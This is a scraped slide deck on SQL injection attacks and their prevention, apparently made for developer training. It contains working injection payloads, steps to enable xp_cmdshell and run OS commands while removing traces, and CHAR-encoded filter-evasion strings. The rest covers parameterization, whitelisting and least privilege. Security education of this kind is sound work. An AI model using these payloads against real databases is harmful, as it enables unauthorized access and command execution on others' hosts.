View
1.767
Download
2
Category
Preview:
DESCRIPTION
Devouring Security Sqli is an exploitation and prevention presentation that I did a while back. The presentation accompanies a screen recording which could be located at http://vimeo.com/gmaran23
Citation preview
Devouring Security
Sqli Exploitation & prevention
Part 1 & 2
Marudhamaran Gunasekaran
Watch the screen recording of this presentation at
Devouring Security – Sql Injection Part 1 - http://vimeo.com/83658524 Devouring Security – Sql Injection Part 2 – http://vimeo.com/85256464
Security
FeelingReality
Trade offsWisdom
Ignorance is no excuse
Disclaimer
Techniques and Tools in this presentation should be used or applied on an application, only with prior consent of the application’s owner.
Illegal otherwise.
Sqli – Media coveragehttp://w
ww
.bloomberg.com
/news/2013-01-24/sony-fined-394-000-over-2011-hacker-attack-on-playstation-data.htm
l
Sqli – Media coverage http://ww
w.eteknix.com
/turkish-hackers-claim-to-have-leaked-40000-sony-italy-account-details/
Sqli – Media coveragehttp://new
s.techworld.com
/security/3331283/barclays-97-percent-of-data-breaches-still-due-to-sql-injection/
Sqli – MediaCoverage
Sqli – Why does it exist?Yeah! I can develop/deploy without restrictions , I have full access.
Thanks bro! I am your uninvited database administrator now. I owe you, and your data.
I like them admin rights
Sqli – Why does it exist?
Conglomeration of Sensitive Data
Would you keep all your belongings in your home, or would you keep some in your safe deposit box?
Blindly Trusting Unsanitized User Input
"Over thousands of queries in a moderate- to large-size application, that 2% can result in a handful of SQL injections," Chou says. "All an attacker needs to do is find one of these, and you'll have millions of records stolen and a headline in Dark Reading.“
Sqli – Why does it exist?
• It’s not always about a developer knowing better, there are tons and tons of legacy code• Remember, DBA’s write SQL too• No strict access control policies• Windows based/Desktop based applications are
directly ported to the web• Developer’s still don’t know the complete truths
about Sqli
Sqli 101
../Products?name=ratSELECT 1 FROM Products WHERE ProductName =
‘rat‘
../Products?name=rat‘ or 1=1 --
SELECT 1 FROM Products WHERE ProductName = ‘rat’ or 1=1 -- ’
or true
Sqli 101
• http://sqli:8020/Sqli/
• http://localhost/WebGoat/attack?Screen=147&menu=1100&stage=1
Sqli U
Sqli U
http://sqli:8020/Sqli/ProductSearch
Sqli E
Sqli E
http://sqli:8020/SqliErrorRiddle/
Sqli E-- table enumeratorSELECT TOP 1 Convert(INT, NAME)FROM sys.tablesWHERE object_id = (
SELECT TOP 1 object_idFROM (
SELECT TOP 2 object_idFROM sys.tablesORDER BY object_id) AS TEMP
ORDER BY object_id DESC)
Enumerating in MySQl is very easy with OFFSET.
ORMs and SPs Loopholes
http://sqli:8020/SqliORM/ProductSearch
It’s not an ORM’s problem to have you loaded with features
ALTER PROCEDURE SearchProducts (@Item VARCHAR(100))ASBEGIN
DECLARE @query VARCHAR(400)
SET @query = 'SELECT * FROM Products WHERE ProductName LIKE ''%' + @Item + '%'''
PRINT @query
EXEC (@query)ENDGO----------------------------------------------------------------------------------------------- Execute goodEXEC SearchProducts 'chai'GO-- Execute badEXEC SearchProducts 'chai%'' or 1=1--'GO
Fixing SP LoopholesALTER PROCEDURE SearchProductsBetter (@Item VARCHAR(200))ASBEGIN
DECLARE @safequery NVARCHAR(400)DECLARE @params NVARCHAR(200)
SET @safequery = N'SELECT * FROM Products WHERE ProductName LIKE ''%'' + @param1 + ''%'''
SET @params = N'@param1 NVARCHAR(200)‘;
EXECUTE SP_EXECUTESQL @safequery,@params,@param1 = @Item
ENDGO----------------------------------------------------------------------------------------------- Execute badEXEC SearchProductsBetter 'chai%'' or 1=1--'GO
Profiling Host OS
• Privilege misuse and rooting
Profiling Host OS
-- enable command shellEXEC sp_configure 'show advanced options',
1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
-- disable command shellEXEC sp_configure 'show advanced options',
1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;
Profiling Host OS
-- play time!exec xp_cmdshell 'tasklist‘
exec master.dbo.xp_cmdshell 'whoami‘
exec xp_cmdshell 'netsh advfirewall firewall show rule name=all profile=public'
Profiling Host OS
-- enumerate and remove tracecreate table tempsz(temp varchar(MAX));insert into tempsz exec
xp_cmdshell 'tasklist';select * from tempsz;drop table tempsz;
-- enumerate and leave tracecreate table tempsz(temp varchar(MAX));insert into tempsz exec
xp_cmdshell 'tasklist';
-- get enumerated information and remove traceselect temp from tempsz;drop table tempsz;
Profiling Host OS
-- schedule a shutdown and send message to the user named maran
exec xp_cmdshell 'shutdown -s -t 6000'; exec xp_cmdshell 'msg maran You will be shut down in 100 minutes'
-- abort the shutdown and send message to the user named maran
exec xp_cmdshell 'shutdown -a'; exec xp_cmdshell 'msg maran I have heard your prayer. You are salvaged'
Profiling Host OS
OSCommand_Run in Oracle does the equivalent of xp_cmdshell in Sql server.
Sqli T
Just biding time, my friend
Sqli T
OracleDBMS_LOCK.sleep
TSql
WAIT FOR DELAY
MySqlBENCHMARK
Sqli BBlind, but I could get by
Sqli BBlind, not as fast, but I could travel miles
IDS Evasive Techniques
‘485’=“485”‘5’>’1’“QSNR”=“QSNR”REPLACE('SEL/**/CT', '/**/', '')
Blacklist Filter Evasion
';exec xP_cMdsheLL 'dir';--
';ex/**/ec xp_cmds/**/hell 'dir';-- [old versions]
';exec/**/xp_cmdshell/**/'dir';--
';Declare @cmd as varchar(3000);Set @cmd = 'x'+'p'+'_'+'c'+'m'+'d'+'s'+'h'+'e'+'l'+'l'+'/**/'+''''+'d'+'i'+'r'+'''';exec(@cmd);--
Blacklist Filter Evasion Declare @cmd as varchar(3000);Set @cmd
=(CHAR(101)+CHAR(120)+CHAR(101)+CHAR(99)+CHAR(32)+CHAR(109)+CHAR(97)+CHAR(115)+CHAR(116)+CHAR(101)+CHAR(114)+CHAR(46)+CHAR(46)+CHAR(120)+CHAR(112)+CHAR(95)+CHAR(99)+CHAR(109)+CHAR(100)+CHAR(115)+CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(32)+CHAR(39)+CHAR(100)+CHAR(105)+CHAR(114)+CHAR(39)+CHAR(59));EXEC(@cmd);--
EXEC (exec master..xp_cmdshell 'dir')
Sqli Exploitation tools
• Sqlmap• sqlninja• Safe3SI• Enema• Havij• Pangolin• BSQL Hacker……………………. and a lot more
Sqli Exploitation tools
Demonstration
1.Safe3SI2.Enema3.Sqlmap
Sqli Feeble Fixes
Blacklisting is suicide
IDSs are not very effective for Sqli
Feeble Fixes
Blacklisting
(can’t filter all possible dangerous inputs like below)
“QSNR”=“QSNR”REPLACE('SEL/**/CT', '/**/', '')
Blacklisting for Death
Blacklisting for Death
Blacklisting for Death
Sqli Prevention
Sqli Prevention
Exploitation toolsFuzzers Active/Passive vulnerability scanners
Core Defense
Input Validation with Whitelist, Type casting or/and RegEx.
Core Defense Validation with RegEx
Core DefenseCREATE PROCEDURE dbo.doQuery (@id NCHAR(4))ASDECLARE @query NCHAR(64)
IF RTRIM(@id) LIKE '[0-9][0-9][0-9][0-9]'BEGIN
SELECT @query = 'select ccnum from cust where id = ''' + @id + ''''
EXEC @queryEND
RETURN
-- Or, better yet, force an interger parameter
CREATE PROCEDURE dbo.doQuery(@id smallint)
Core Defense
Parametrization a.k.a prepared statements
[refer to your framework for support]
Core Defense
Encrypt data to prevent disclosure when physical database files are stolen.
1. Encryption does not do a darn thing to protect you from direct Sqli2. Encryption only protects you from Sqli induced attacks
Core Defense
Database user account audits
1. Selective privilege principle2. Least privilege principle
Code Reviews - Spot and Stop Sqli
Code Reviews - Spot and Stop Sqli
CAT.Net Sqli Scan
CAT.Net Sqli Scan
MicrosoftACECodeAnalysisReport.htm
Netsparker community edition
What now?
Sqli Cheatsheet - http://ferruh.mavituna.com/sql-injection-
cheatsheet-oku Dynamic queries in T-SQL - http://www.sommarskog.se/dyn-search-
2005.htmlhttp://www.sommarskog.se/dyn-search-
2008.html
End of the world
Watch the screen recording of this presentation at my vimeo channel
Devouring Security – Sql Injection Part 1 - http://vimeo.com/83658524
Devouring Security – Sql Injection Part 2 – http://vimeo.com/85256464
Recommended